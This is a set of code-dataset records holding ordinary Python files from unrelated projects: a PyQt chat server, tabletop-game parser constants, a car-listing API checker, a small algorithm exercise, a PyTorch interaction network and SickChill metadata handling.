currentTime.strftime(\"%H:%M:%S\")\r\n\t\t\tself.reportTE.append(self.time + \": \" + message.decode(\"utf-8\"))\r\n\r\n\t\tif self.recordingFlag != 0 and self.recordingFlag % 2 != 0 and typeMSG == 0:\r\n\t\t\tcurrentTime = datetime.datetime.now()\r\n\t\t\tself.time = currentTime.strftime(\"%H:%M:%S\")\r\n\t\t\tdate1 = currentTime.strftime(\"%d-%m-%Y\")\r\n\t\t\tfile = codecs.open(self.BASE_DIR + \"/Server/Records/\" + self.recordName, \"a\", \"utf-8\")\r\n\t\t\tfile.writelines(\"\\n\" + self.time + \": \" + message.decode(\"utf-8\"))\r\n\t\t\tfile.close()\r\n\t\tfor client1 in self.clients:\r\n\t\t\tif client1 != client:\r\n\t\t\t\tclient1.sendall(message)\r\n\r\n\tdef handle(self, client):\r\n\t\ttry:\r\n\t\t\twhile self.runnable == True:\r\n\t\t\t\tmessage = client.recv(4096)\r\n\t\t\t\tself.broadcast(message, 0, client)\r\n\t\t\t\tmsg = message.decode(\"utf-8\")\r\n\t\t\t\tself.addMessage(msg)\r\n\r\n\t\t\t\tif msg[:5] == \"FILE:\":\r\n\t\t\t\t\tself.fileName = msg[5:len(msg)]\r\n\t\t\t\t\tif (self.recordingFlag != 0 and self.recordingFlag % 2 != 0):\r\n\t\t\t\t\t\twith open(self.BASE_DIR + \"/Server/Recieves/\" + self.fileName, \"wb\") as file:\r\n\t\t\t\t\t\t\twhile True: \r\n\t\t\t\t\t\t\t\tfileData = client.recv(4096)\r\n\t\t\t\t\t\t\t\tfile.write(fileData)\r\n\t\t\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\t\t\tself.broadcast(fileData, 2, client)\r\n\t\t\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\t\t\tpass\r\n\t\t\t\t\t\t\t\tif len(fileData) < 4096:\r\n\t\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\twhile True: \r\n\t\t\t\t\t\t\tfileData = client.recv(4096)\r\n\t\t\t\t\t\t\tself.broadcast(fileData, 2, client)\r\n\t\t\t\t\t\t\tif len(fileData) < 4096:\r\n\t\t\t\t\t\t\t\tbreak\r\n\t\texcept:\r\n\t\t\tindex = self.clients.index(client)\r\n\t\t\tself.clients.remove(client)\r\n\t\t\tclient.close()\r\n\t\t\tnickname = self.nicknames[index]\r\n\t\t\tself.broadcast('Nickname {} left!'.format(nickname).encode('utf-8'), 1)\r\n\t\t\tself.reportTE.setTextColor(QColor(255, 0, 0))\r\n\t\t\tcurrentTime = datetime.datetime.now()\r\n\t\t\tself.time = currentTime.strftime(\"%H:%M:%S\")\r\n\t\t\tself.reportTE.append(self.time + \": Nickname \"+ nickname +' left!')\r\n\t\t\tself.nicknames.remove(nickname)\r\n\tdef receive(self):\r\n\t\ttry:\r\n\t\t\twhile self.runnable == True:\r\n\t\t\t\tclient, address = server.accept()\r\n\t\t\t\tself.reportTE.setTextColor(QColor(0, 0, 0))\r\n\t\t\t\tcurrentTime = datetime.datetime.now()\r\n\t\t\t\tself.time = currentTime.strftime(\"%H:%M:%S\")\r\n\t\t\t\tself.reportTE.append(self.time + \": Connected with \" + str(address))\r\n\t\t\t\tclient.send('NICK'.encode('utf-8'))\r\n\t\t\t\tnickname = client.recv(1024).decode('utf-8')\r\n\t\t\t\tself.nicknames.append(nickname)\r\n\t\t\t\tself.clients.append(client)\r\n\t\t\t\tself.reportTE.append(\"Nickname is \" + str(nickname))\r\n\t\t\t\tthread1 = threading.Thread(target=self.addNickname, args=(client, nickname))\r\n\t\t\t\tthread1.start()\r\n\t\t\t\tself.broadcast(\"{} joined!\".format(nickname).encode('utf-8'), 1, client)\r\n\t\t\t\tclient.send('Connected to server!'.encode('utf-8'))\r\n\t\t\t\tthread2 = threading.Thread(target=self.handle, args=(client,))\r\n\t\t\t\tthread2.start()\r\n\t\texcept:\r\n\t\t\tself.reportTE.setTextColor(QColor(80, 0, 255))\r\n\t\t\tself.reportTE.append(self.time + \": \" + \"An error occured!\")\r\n\t\t\tserver.close()\r\n\r\n\tdef runServer(self):\r\n\t\tkillPort(self.port)\r\n\t\tserver.bind((self.ip, self.port))\r\n\t\tserver.listen()\r\n\t\tself.reportTE.setTextColor(QColor(30, 255, 
0))\r\n\t\tcurrentTime = datetime.datetime.now()\r\n\t\tself.time = currentTime.strftime(\"%H:%M:%S\")\r\n\t\tself.reportTE.append(self.time + \": Server is running!\")\r\n\t\tself.reportTE.setTextColor(QColor(80, 0, 255))\r\n\t\tself.reportTE.append(\"Server IP: \" + self.ip)\r\n\t\tself.reportTE.append(\"Server Port: \" + str(self.port))\r\n\t\tself.runnable = True\r\n\t\tself.createData()\r\n\t\tself.receive()\r\n\r\n\tdef setupUi(self, ServerWD, ip, port):\r\n\t\tself.ip = ip\r\n\t\tself.port = port\r\n\r\n\t\tself.clients = []\r\n\t\tself.nicknames = []\r\n\r\n\t\tself.trackingFlag = False\r\n\t\tself.recordingFlag = 0\r\n\t\tself.runnable = False\r\n\r\n\r\n\t\tself.BASE_DIR = os.path.dirname(os.path.abspath(__file__))\r\n\t\tself.dataDIR = self.BASE_DIR + \"/Server/Data/data.db\"\r\n\t\tself.messageTableName = \"S\" + self.IPTransform() + \"_\" + str(self.port)\r\n\t\tself.clientTableName = \"S\" + self.IPTransform() + \"_\" + str(self.port) + \"_clients\"\r\n\r\n\t\tServerWD.setObjectName(\"ServerWD\")\r\n\t\tServerWD.resize(350, 450)\r\n\t\tServerWD.setMinimumSize(QtCore.QSize(350, 450))\r\n\t\tServerWD.setMaximumSize(QtCore.QSize(350, 450))\r\n\t\tself.centralwidget = QtWidgets.QWidget(ServerWD)\r\n\t\tself.centralwidget.setObjectName(\"centralwidget\")\r\n\r\n\t\tself.dateLB = QtWidgets.QLabel(self.centralwidget)\r\n\t\tself.dateLB.setGeometry(QtCore.QRect(10, 10, 75, 13))\r\n\t\tself.dateLB.setStyleSheet(stylesheet)\r\n\t\tself.dateLB.setObjectName(\"dateLB\")\r\n\r\n\t\tself.timeLB = QtWidgets.QLabel(self.centralwidget)\r\n\t\tself.timeLB.setGeometry(QtCore.QRect(290, 10, 65, 13))\r\n\t\tself.timeLB.setStyleSheet(stylesheet)\r\n\t\tself.timeLB.setObjectName(\"timeLB\")\r\n\r\n\t\tself.reportTE = QtWidgets.QTextEdit(self.centralwidget)\r\n\t\tself.reportTE.setGeometry(QtCore.QRect(10, 30, 331, 357))\r\n\t\tself.reportTE.setReadOnly(True)\r\n\t\tself.reportTE.setObjectName(\"reportTE\")\r\n\r\n\t\tself.trackingBT = QtWidgets.QPushButton(self.centralwidget)\r\n\t\tself.trackingBT.setGeometry(QtCore.QRect(10, 395, 35, 35))\r\n\t\tself.trackingBT.setStyleSheet(stylesheet)\r\n\t\tself.trackingBT.setObjectName(\"trackingBT\")\r\n\t\tself.trackingBT.setToolTip('Tracking the conversation in chat room')\r\n\r\n\t\tself.recordBT = QtWidgets.QPushButton(self.centralwidget)\r\n\t\tself.recordBT.setGeometry(QtCore.QRect(305, 395, 35, 35))\r\n\t\tself.recordBT.setStyleSheet(stylesheet1)\r\n\t\tself.recordBT.setObjectName(\"recordBT\")\r\n\t\tself.recordBT.setToolTip('Start tracking the conversation in chat room')\r\n\r\n\t\tself.listBT = QtWidgets.QPushButton(self.centralwidget)\r\n\t\tself.listBT.setGeometry(QtCore.QRect(158, 395, 35, 35))\r\n\t\tself.listBT.setStyleSheet(stylesheet2)\r\n\t\tself.listBT.setObjectName(\"listBT\")\r\n\t\tself.listBT.setToolTip('Show all clients in chat room')\r\n\r\n\t\tServerWD.setCentralWidget(self.centralwidget)\r\n\t\tself.statusbar = QtWidgets.QStatusBar(ServerWD)\r\n\t\tself.statusbar.setObjectName(\"statusbar\")\r\n\r\n\t\tServerWD.setStatusBar(self.statusbar)\r\n\r\n\t\t#Automatic\r\n\t\tself.datetimeThread = threading.Thread(target = self.setCurrentTime)\r\n\t\tself.datetimeThread.start()\r\n\t\tserverThread = threading.Thread(target = self.runServer)\r\n\t\tserverThread.start()\r\n\t\t#Functions
\r\n\t\tself.trackingBT.clicked.connect(self.changeTrackingFlag)\r\n\t\tself.recordBT.clicked.connect(self.changeRecordingFlag)\r\n\t\tself.listBT.clicked.connect(self.showClientList)\r\n\r\n\t\tself.retranslateUi(ServerWD)\r\n\t\tQtCore.QMetaObject.connectSlotsByName(ServerWD)\r\n\r\n\tdef retranslateUi(self, ServerWD):\r\n\t\t_translate = QtCore.QCoreApplication.translate\r\n\t\tServerWD.setWindowTitle(_translate(\"ServerWD\", \"Cloud Chat - Server\"))\r\n\t\tself.dateLB.setText(_translate(\"ServerWD\", \"TextLabel\"))\r\n\t\tself.timeLB.setText(_translate(\"ServerWD\", \"TextLabel\"))\r\n\r\nstylesheet = \"\"\"\r\n\tQLabel {\r\n\t\tfont: bold 10px;\r\n\t\tcolor: #ffffff;\r\n\t}\r\n\r\n\tQPushButton {\r\n\t\tbackground-image: url(Images/eye.png);\r\n\t\tbackground-repeat: no-repeat;\r\n\t\tbackground-position: center;\r\n\t}\r\n\"\"\"\r\n\r\nstylesheet1 = \"\"\"\r\n\tQPushButton {\r\n\t\tbackground-image: url(Images/record.png);\r\n\t\tbackground-repeat: no-repeat;\r\n\t\tbackground-position: center;\r\n\t}\r\n\"\"\"\r\n\r\nstylesheet2 = \"\"\"\r\n\tQPushButton {\r\n\t\tbackground-image: url(Images/list.png);\r\n\t\tbackground-repeat: no-repeat;\r\n\t\tbackground-position: center;\r\n\t}\r\n\"\"\"\r\n\r\nclass ServerWindow(QtWidgets.QMainWindow):\r\n\tdef closeEvent(self, event):\r\n\t\tserver.close()\r\n\t\tevent.accept()\r\n\r\nif __name__ == \"__main__\":\r\n\timport sys\r\n\tapp = QtWidgets.QApplication(sys.argv)\r\n\tServerWD = ServerWindow()\r\n\tui = Ui_ServerWD()\r\n\tui.setupUi(ServerWD, \"127.0.0.1\", 55555)\r\n\tServerWD.show()\r\n\tsys.exit(app.exec_())\r\n\r\n","repo_name":"windminer1310/CloudChat","sub_path":"CloudChat/ServerWD.py","file_name":"ServerWD.py","file_ext":"py","file_size_in_byte":13244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36103488870","text":"from src.parsers.heresy import heresy\nfrom src.parsers.killteam import killteam\nfrom src.parsers.w40k import w40k\n\nKILLTEAM_ID: str = \"3b7e-7dab-f79f-2e74\"\n\nHORUS_HERESY_ID: str = \"28d4-bd2e-4858-ece6\"\n\nWARHAMMER_40K_ID: str = \"28ec-711c-d87f-3aeb\"\n\nSUPPORTED_PARSERS = {KILLTEAM_ID: killteam, HORUS_HERESY_ID: heresy, WARHAMMER_40K_ID: w40k}\nTEMPLATES = {KILLTEAM_ID: \"killteam.html\", HORUS_HERESY_ID: \"heresy.html\", WARHAMMER_40K_ID: \"w40k.html\"}\n\nWARHAMMER_40K_NAME: str = \"\"\n\nAGE_OF_SIGMAR_ID: str = \"\"\nAGE_OF_SIGMAR_NAME: str = \"\"\n\nSUPPORTED_BATTLESCRIBE_VERSION = \"2.03\"\n\nBATTLESCRIBE_VERSION_ERROR = {\n    \"ERROR\": \"battlescribe version not supported, please upgrade; the current supported version is {}\".format(\n        SUPPORTED_BATTLESCRIBE_VERSION\n    )\n}\n","repo_name":"stvnksslr/dataslate-parser","sub_path":"src/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"34694076824","text":"import datetime\nimport json\nfrom dotenv import load_dotenv\nimport os\nimport requests\nimport time\nimport bucket\n\n\nload_dotenv()\ntoken = os.getenv('MANAGER_TOKEN')\nURL = 'https://apiauto.ru/1.0/comeback'\ndate_today = datetime.datetime.now()\nt1 = datetime.datetime.today().strftime('%Y-%m-%d')\nt2 = f'{t1} 00:01:00.000'\nperiod = int((datetime.datetime.strptime(t2, '%Y-%m-%d %H:%M:%S.%f')).timestamp() * 1000)\n\nh = date_today.hour\nday = 3\nday_milli = day * 86400000\nlast_23h = int(time.time()*1000 - day_milli)# - 5184000000)#89600000)\nlast_hour = 
int(time.time()*1000 - 3600000)\nr = time.ctime(last_hour)\n\n\ndef choose_time(name: str) -> float:\n    if name != 'Profi':\n        return last_23h\n    else:\n        return period\n\n\ndef record_offers(id: str) -> bool:\n    \"\"\"check the offer IDs against the data stored in the bucket\"\"\"\n    obj = bucket.get_object(bucket.auth())\n    search_date = obj.get(t1, None)\n    if search_date is not None:\n        if id not in search_date:\n            search_date.append(id)\n            bucket.load_object(bucket.auth(), obj)\n            return True\n    else:\n        obj[t1] = []\n        bucket.load_object(bucket.auth(), obj)\n        return False\n\n\ndef sale_back(dealer_id: int, name: str, session_id: str) -> str or None:\n    start_from = choose_time(name)\n    headers = {\n        'X-Session-Id': session_id,\n        'X-Authorization': token,\n        'Accept': 'application/json',\n        'x-dealer-id': dealer_id,\n    }\n    data = {\n        \"pagination\": {\n            \"page\": 1,\n            \"page_size\": 10\n        },\n        \"filter\": {\n            \"creation_date_from\": start_from,\n        },\n        \"only_last_seller\": False,\n\n    }\n    r = requests.post(URL, json=data, headers=headers).json()\n    print(r)\n    text = ''\n    try:\n        for value in r['comebacks']:\n            status = value['offer']['status']\n            created = value['offer']['created']\n            print(created)\n            date = str(created).split('T')[0]\n            if status == 'ACTIVE':\n                mark = value['offer']['car_info']['mark']\n                model = value['offer']['car_info']['model']\n                url = value['offer']['mobile_url']\n                offer_id = value['offer']['id']\n                new_offer = record_offers(offer_id)\n                if new_offer is True:\n                    text += f'{name} {mark} {model}\\n{url}\\n'\n                else:\n                    pass\n        if len(text) > 0:\n            print(text)\n            return text\n        else:\n            return None\n    except:\n        pass\n","repo_name":"MaratBo/chat_bot_v2","sub_path":"sale_back.py","file_name":"sale_back.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34516103664","text":"import sys\n\narr = list(map(int,sys.stdin.readline().rstrip()))\n\nfront = 0\nback = 0\n\nfor i in arr[0:len(arr)//2]:\n    front += i\n\nfor i in arr[len(arr)//2:]:\n    back += i\n\nif front == back:\n    print(\"LUCKY\")\nelse:\n    print(\"READY\")","repo_name":"asdf28/Daily-Algorithm","sub_path":"PythonStudy/TICT/Q7_LuckStraight.py","file_name":"Q7_LuckStraight.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70511042669","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom MLPs import *\nfrom util import *\nimport copy\n\nclass RelationModel(nn.Module):\n    def __init__(self, input_size, hidden_size, output_size):\n        super(RelationModel, self).__init__()\n\n        self.model = nn.Sequential(\n            nn.Linear(input_size, hidden_size),\n            nn.ReLU(),\n            nn.Linear(hidden_size, hidden_size),\n            nn.ReLU(),\n            nn.Linear(hidden_size, hidden_size),\n            nn.ReLU(),\n            nn.Linear(hidden_size, output_size),\n            nn.ReLU()\n        )\n\n    def forward(self, x):\n        '''\n        Args:\n            x: [n_relations, input_size]\n        Returns:\n            [n_relations, output_size]\n        '''\n        return self.model(x)\n\n\nclass ObjectModel(nn.Module):\n    def __init__(self, input_size, hidden_size, output_size):\n        super(ObjectModel, self).__init__()\n\n        self.model = nn.Sequential(\n            nn.Linear(input_size, hidden_size),\n            nn.ReLU(),\n            nn.Linear(hidden_size, output_size)\n        )\n\n    def forward(self, x):\n        '''\n        Args:\n            x: [n_objects, input_size]\n        Returns:\n            [n_objects, output_size]\n\n        Note: output_size = number of states we want to predict\n        '''\n        return 
self.model(x)\n\nclass InteractionNetwork(BasicModel):\n def __init__(self, args, x_dim=0):\n super(InteractionNetwork, self).__init__(args, 'InteractionNetwork')\n \n self.device = args.device\n self.bs = args.batch_size\n self.n_objects = args.n_objects\n self.n_relations = self.n_objects * (self.n_objects - 1)\n self.obj_dim = args.node_feature_size\n\n self.rel_dim = args.edge_feature_size\n answer_size = args.answer_size\n self.eff_dim, hidden_rel_dim, hidden_obj_dim = args.hidden_dim, args.hidden_dim, args.hidden_dim\n self.rm = RelationModel(self.obj_dim * 2 + self.rel_dim, hidden_rel_dim, self.eff_dim)\n self.om = ObjectModel(self.obj_dim + self.eff_dim + x_dim, hidden_obj_dim, answer_size) # x, y\n \n receiver_r = np.zeros((self.n_objects, self.n_relations), dtype=float)\n sender_r = np.zeros((self.n_objects, self.n_relations), dtype=float)\n\n count = 0 # used as idx of relations\n for i in range(self.n_objects):\n for j in range(self.n_objects):\n if i != j:\n receiver_r[i, count] = 1.0\n sender_r[j, count] = 1.0\n count += 1\n\n self.rs = Variable(torch.FloatTensor(sender_r)).to(self.device)\n self.rr = Variable(torch.FloatTensor(receiver_r)).to(self.device)\n #self.ra = Variable(torch.FloatTensor(r_info)).to(self.device)\n \n if args.optimizer == 'Adam':\n self.optimizer = optim.Adam(self.parameters(), lr=args.lr, weight_decay=args.decay)\n else:\n self.optimizer = optim.SGD(self.parameters(), lr=args.lr, weight_decay=args.decay)\n\n def norm(self, a, b):\n return torch.norm(a - b, 2)\n\n def m(self, obj, bs):\n \"\"\"\n The marshalling function;\n computes the matrix products ORr and ORs and concatenates them with Ra\n\n :param obj: object states\n :param rr: receiver relations\n :param rs: sender relations\n :param ra: relation info\n :return:\n \"\"\"\n r_info = np.zeros((bs, self.rel_dim, self.n_relations))\n ra = Variable(torch.FloatTensor(r_info)).to(self.device)\n for b in range(bs):\n count = 0\n for i in range(self.n_objects):\n for j in range(self.n_objects):\n if i != j:\n s_mass = obj[b, j, 0]\n s_pos = obj[b, j, 1:3]\n r_pos = obj[b, i, 1:3]\n ra[b, :, count] = s_mass* (s_pos - r_pos)/ self.norm(s_pos, r_pos)**3\n count += 1\n\n obj_t = torch.transpose(obj, 1, 2).reshape(-1, self.n_objects) # (bs * obj_dim, n_objects)\n orr = obj_t.mm(self.rr).reshape((bs, self.obj_dim, -1)) # (bs, obj_dim, n_relations)\n ors = obj_t.mm(self.rs).reshape((bs, self.obj_dim, -1)) # (bs, obj_dim, n_relations)\n\n return torch.cat([orr, ors, ra], dim = 1) # (bs, obj_dim*2+rel_dim, n_relations)\n\n def forward(self, obj, bs, x=None):\n \"\"\"\n objects, sender_relations, receiver_relations, relation_info\n :param obj: (bs, n_objects, obj_dim)\n :param rr: (n_objects, n_relations)\n :param rs: (n_objects, n_relations)\n :param x: external forces, default to None\n :return:\n \"\"\"\n # marshalling function\n b = self.m(obj, bs) # shape of b = (bs, obj_dim*2+rel_dim, n_relations)\n # relation module\n e = self.rm(torch.transpose(b, 1, 2)) # shape of e = (bs, n_relations, eff_dim)\n e = torch.transpose(e, 1, 2).reshape(-1, self.n_relations) # shape of e = (bs * eff_dim, n_relations)\n # effect aggregator\n if x is None:\n # shape of a = (bs, obj_dim+eff_dim, n_objects)\n a = torch.cat([torch.transpose(obj, 1, 2), e.mm(self.rr.t()).reshape((bs, self.eff_dim, -1))], dim = 1) \n else:\n # [unchanged] shape of a = (obj_dim+ext_dim+eff_dim, n_objects) \n a = torch.cat([torch.transpose(obj, 1, 2), x, e.mm(self.rr.t())]) \n # object module\n p = self.om(torch.transpose(a, 1, 2)) # shape of p = 
(bs, n_objects, answer_size)\n\n return p","repo_name":"liqing-ustc/CS249-GNN-Final","sub_path":"n_body/in_network.py","file_name":"in_network.py","file_ext":"py","file_size_in_byte":5628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25092872330","text":"import ee\r\nimport mercury as mr\r\n\r\ndef customds_initialization(m, date_one, date_two, custom_ds):\r\n ds = ee.ImageCollection(custom_ds.value).filterDate(str(date_one.value), str(date_two.value))\r\n custom_bands = mr.MultiSelect(label=\"[Custom DS] Select dataset bands\",\r\n value=[],\r\n choices=['SR_B1', 'SR_B2', 'SR_B3', 'SR_B4', 'SR_B5', 'SR_B6', 'SR_B7', 'B1', 'B2', 'B3', 'B4', 'B5', 'B6', 'B7', 'B8', 'B9', 'B10', 'B11'])\r\n\r\n ds_custom = ds.select(custom_bands.value)\r\n vis_custom = {'bands': custom_bands.value}\r\n\r\n m.addLayer(ds_custom, vis_custom, \"Custom GEE dataset\")\r\n","repo_name":"olgerdflorian/gaia","sub_path":"gee/modules/customds_init.py","file_name":"customds_init.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13089842168","text":"import os\nimport re\nfrom typing import Union\nfrom xml.etree import ElementTree\n\nimport fanart\nimport tmdbsimple\nfrom fanart.core import Request as fanartRequest\n\nimport sickchill\nfrom sickchill import logger, settings\nfrom sickchill.helper.common import remove_extension, replace_extension, try_int\nfrom sickchill.oldbeard import helpers\n\nfrom . import helpers as metadata_helpers\n\n\nclass GenericMetadata(object):\n \"\"\"\n Base class for all metadata providers. Default behavior is meant to mostly\n follow KODI 12+ metadata standards. Has support for:\n - show metadata file\n - episode metadata file\n - episode thumbnail\n - show fanart\n - show poster\n - show banner\n - season thumbnails (poster)\n - season thumbnails (banner)\n - season all poster\n - season all banner\n \"\"\"\n\n def __init__(\n self,\n show_metadata=False,\n episode_metadata=False,\n fanart=False,\n poster=False,\n banner=False,\n episode_thumbnails=False,\n season_posters=False,\n season_banners=False,\n season_all_poster=False,\n season_all_banner=False,\n ):\n self.name = \"Generic\"\n\n self._ep_nfo_extension = \"nfo\"\n self._show_metadata_filename = \"tvshow.nfo\"\n\n self.fanart_name = \"fanart.jpg\"\n self.poster_name = \"poster.jpg\"\n self.banner_name = \"banner.jpg\"\n\n self.season_all_poster_name = \"season-all-poster.jpg\"\n self.season_all_banner_name = \"season-all-banner.jpg\"\n\n self.show_metadata = show_metadata\n self.episode_metadata = episode_metadata\n self.fanart = fanart\n self.poster = poster\n self.banner = banner\n self.episode_thumbnails = episode_thumbnails\n self.season_posters = season_posters\n self.season_banners = season_banners\n self.season_all_poster = season_all_poster\n self.season_all_banner = season_all_banner\n\n def get_config(self):\n config_list = [\n self.show_metadata,\n self.episode_metadata,\n self.fanart,\n self.poster,\n self.banner,\n self.episode_thumbnails,\n self.season_posters,\n self.season_banners,\n self.season_all_poster,\n self.season_all_banner,\n ]\n return \"|\".join([str(int(x)) for x in config_list])\n\n def get_id(self):\n return GenericMetadata.makeID(self.name)\n\n @staticmethod\n def makeID(name):\n name_id = re.sub(r\"[+]\", \"plus\", name)\n name_id = re.sub(r\"[^\\w\\d_]\", \"_\", name_id).lower()\n return name_id\n\n def set_config(self, 
config_string):\n config_list = [bool(int(x)) for x in config_string.split(\"|\")]\n self.show_metadata = config_list[0]\n self.episode_metadata = config_list[1]\n self.fanart = config_list[2]\n self.poster = config_list[3]\n self.banner = config_list[4]\n self.episode_thumbnails = config_list[5]\n self.season_posters = config_list[6]\n self.season_banners = config_list[7]\n self.season_all_poster = config_list[8]\n self.season_all_banner = config_list[9]\n\n @staticmethod\n def _check_exists(location):\n if location:\n result = os.path.isfile(location)\n logger.debug(f\"Checking if {location} exists: {result}\")\n return result\n return False\n\n def _has_show_metadata(self, show_obj):\n return self._check_exists(self.get_show_file_path(show_obj))\n\n def _has_episode_metadata(self, ep_obj):\n return self._check_exists(self.get_episode_file_path(ep_obj))\n\n def _has_fanart(self, show_obj):\n return self._check_exists(self.get_fanart_path(show_obj))\n\n def _has_poster(self, show_obj):\n return self._check_exists(self.get_poster_path(show_obj))\n\n def _has_banner(self, show_obj):\n return self._check_exists(self.get_banner_path(show_obj))\n\n def _has_episode_thumb(self, ep_obj):\n return self._check_exists(self.get_episode_thumb_path(ep_obj))\n\n def _has_season_poster(self, show_obj, season):\n return self._check_exists(self.get_season_poster_path(show_obj, season))\n\n def _has_season_banner(self, show_obj, season):\n return self._check_exists(self.get_season_banner_path(show_obj, season))\n\n def _has_season_all_poster(self, show_obj):\n return self._check_exists(self.get_season_all_poster_path(show_obj))\n\n def _has_season_all_banner(self, show_obj):\n return self._check_exists(self.get_season_all_banner_path(show_obj))\n\n def get_show_file_path(self, show_obj):\n return os.path.join(show_obj.location, self._show_metadata_filename)\n\n def get_episode_file_path(self, ep_obj):\n return replace_extension(ep_obj.location, self._ep_nfo_extension)\n\n def get_fanart_path(self, show_obj):\n return os.path.join(show_obj.location, self.fanart_name)\n\n def get_poster_path(self, show_obj):\n return os.path.join(show_obj.location, self.poster_name)\n\n def get_banner_path(self, show_obj):\n return os.path.join(show_obj.location, self.banner_name)\n\n @staticmethod\n def get_episode_thumb_path(ep_obj):\n \"\"\"\n Returns the path where the episode thumbnail should be stored.\n ep_obj: a TVEpisode instance for which to create the thumbnail\n \"\"\"\n if os.path.isfile(ep_obj.location):\n tbn_filename = remove_extension(ep_obj.location) + \"-thumb.jpg\"\n else:\n return None\n\n return tbn_filename\n\n @staticmethod\n def get_season_poster_path(show_obj, season):\n \"\"\"\n Returns the full path to the file for a given season poster.\n\n show_obj: a TVShow instance for which to generate the path\n season: a season number to be used for the path. Note that season 0\n means specials.\n \"\"\"\n\n # Our specials thumbnail is, well, special\n if season == 0:\n season_poster_filename = \"season-specials\"\n else:\n season_poster_filename = f\"season{season:02d}\"\n\n return os.path.join(show_obj.location, f\"{season_poster_filename}-poster.jpg\")\n\n @staticmethod\n def get_season_banner_path(show_obj, season):\n \"\"\"\n Returns the full path to the file for a given season banner.\n\n show_obj: a TVShow instance for which to generate the path\n season: a season number to be used for the path. 
Note that season 0\n means specials.\n \"\"\"\n\n # Our specials thumbnail is, well, special\n if season == 0:\n season_banner_filename = \"season-specials\"\n else:\n season_banner_filename = f\"season{season:02d}\"\n\n return os.path.join(show_obj.location, f\"{season_banner_filename}-banner.jpg\")\n\n def get_season_all_poster_path(self, show_obj):\n return os.path.join(show_obj.location, self.season_all_poster_name)\n\n def get_season_all_banner_path(self, show_obj):\n return os.path.join(show_obj.location, self.season_all_banner_name)\n\n def _show_data(self, show_obj) -> Union[ElementTree.ElementTree, None]:\n \"\"\"\n This should be overridden by the implementing class. It should\n provide the content of the show metadata file.\n \"\"\"\n return None\n\n def _ep_data(self, ep_obj) -> Union[ElementTree.ElementTree, None]:\n \"\"\"\n This should be overridden by the implementing class. It should\n provide the content of the episode metadata file.\n \"\"\"\n return None\n\n def create_show_metadata(self, show_obj):\n if self.show_metadata and show_obj and not self._has_show_metadata(show_obj):\n logger.debug(\"Metadata provider \" + self.name + \" creating show metadata for \" + show_obj.name)\n return self.write_show_file(show_obj)\n return False\n\n def update_show_indexer_metadata(self, show_obj):\n if self.show_metadata and show_obj and self._has_show_metadata(show_obj):\n logger.debug(\"Metadata provider \" + self.name + \" updating show indexer info metadata file for \" + show_obj.name)\n\n nfo_file_path = self.get_show_file_path(show_obj)\n\n try:\n with open(nfo_file_path, \"rb\") as xmlFileObj:\n showXML = ElementTree.ElementTree(file=xmlFileObj)\n\n indexerid = showXML.find(\"id\")\n\n root = showXML.getroot()\n if indexerid is not None:\n if indexerid.text == str(show_obj.indexerid):\n return True\n indexerid.text = str(show_obj.indexerid)\n else:\n ElementTree.SubElement(root, \"id\").text = str(show_obj.indexerid)\n\n # Make it purdy\n helpers.indentXML(root)\n\n showXML.write(nfo_file_path, encoding=\"UTF-8\", xml_declaration=True)\n helpers.chmodAsParent(nfo_file_path)\n\n return True\n except IOError as error:\n logger.error(f\"Unable to write file to {nfo_file_path} - are you sure the folder is writable? 
{error}\")\n\n def create_episode_metadata(self, ep_obj):\n if self.episode_metadata and ep_obj and not self._has_episode_metadata(ep_obj):\n logger.debug(\"Metadata provider \" + self.name + \" creating episode metadata for \" + ep_obj.pretty_name)\n return self.write_ep_file(ep_obj)\n return False\n\n def update_episode_metadata(self, ep_obj):\n if self.episode_metadata and ep_obj and self._has_episode_metadata(ep_obj):\n logger.debug(\"Metadata provider \" + self.name + \" updating episode indexer info metadata file for \" + ep_obj.pretty_name)\n nfo_file_path = self.get_episode_file_path(ep_obj)\n\n attribute_map = {\n \"title\": \"name\",\n \"aired\": \"airdate\",\n \"season\": \"season\",\n \"episode\": \"episode\",\n \"showtitle\": \"show.name\",\n \"runtime\": \"show.runtime\",\n \"plot\": \"description\",\n }\n try:\n with open(nfo_file_path, \"rb\") as xmlFileObj:\n episodeXML = ElementTree.ElementTree(file=xmlFileObj)\n\n changed = False\n for attribute in attribute_map:\n try:\n if not hasattr(ep_obj, attribute_map[attribute]):\n continue\n node = episodeXML.find(attribute)\n if node is None:\n continue\n\n text1 = \"\".join(node.text.splitlines())\n text2 = \"\".join(str(getattr(ep_obj, attribute_map[attribute])).splitlines())\n if text1 == text2:\n continue\n node.text = str(getattr(ep_obj, attribute_map[attribute]))\n changed = True\n except AttributeError:\n pass\n\n if not changed:\n return True\n\n root = episodeXML.getroot()\n\n # Make it purdy\n helpers.indentXML(root)\n\n episodeXML.write(nfo_file_path, encoding=\"UTF-8\", xml_declaration=True)\n helpers.chmodAsParent(nfo_file_path)\n\n return True\n except IOError as error:\n logger.warning(f\"Unable to write file to {nfo_file_path} - are you sure the folder is writable? {error}\")\n except ElementTree.ParseError as error:\n logger.warning(f\"Error parsing existing nfo file at {nfo_file_path} - {error}\")\n\n def create_fanart(self, show_obj):\n if self.fanart and show_obj and not self._has_fanart(show_obj):\n logger.debug(\"Metadata provider \" + self.name + \" creating fanart for \" + show_obj.name)\n return self.save_fanart(show_obj)\n return False\n\n def create_poster(self, show_obj):\n if self.poster and show_obj and not self._has_poster(show_obj):\n logger.debug(\"Metadata provider \" + self.name + \" creating poster for \" + show_obj.name)\n return 